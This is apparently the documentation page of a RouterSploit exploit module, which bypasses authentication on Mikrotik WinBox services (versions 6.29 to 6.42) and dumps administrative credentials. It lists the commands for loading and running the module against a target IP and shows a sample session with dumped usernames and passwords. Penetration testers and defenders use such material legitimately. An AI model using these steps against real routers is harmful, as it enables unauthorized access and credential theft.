Skip to content

R
routersploit
Switch branch/tag
Find file
BlameHistoryPermalink
winbox_auth_bypass_creds_disclosure.md 932 Bytes

Description

Module bypass authentication through WinBox service in Mikrotik devices version from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) and retrieves administrative credentials.

Verification Steps

  1. Start ./rsf.py
  2. Do: use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
  3. Do: set target [TargetIP]
  4. Do: run
  5. If device is vulnerable administrative credentials are returned.

Scenarios

rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run
[*] Running module...
[*] Connection established
[+] Target seems to be vulnerable
[*] Dumping credentials

   Username     Password
   --------     --------
   user1        test
   admin        admin
   admin        admin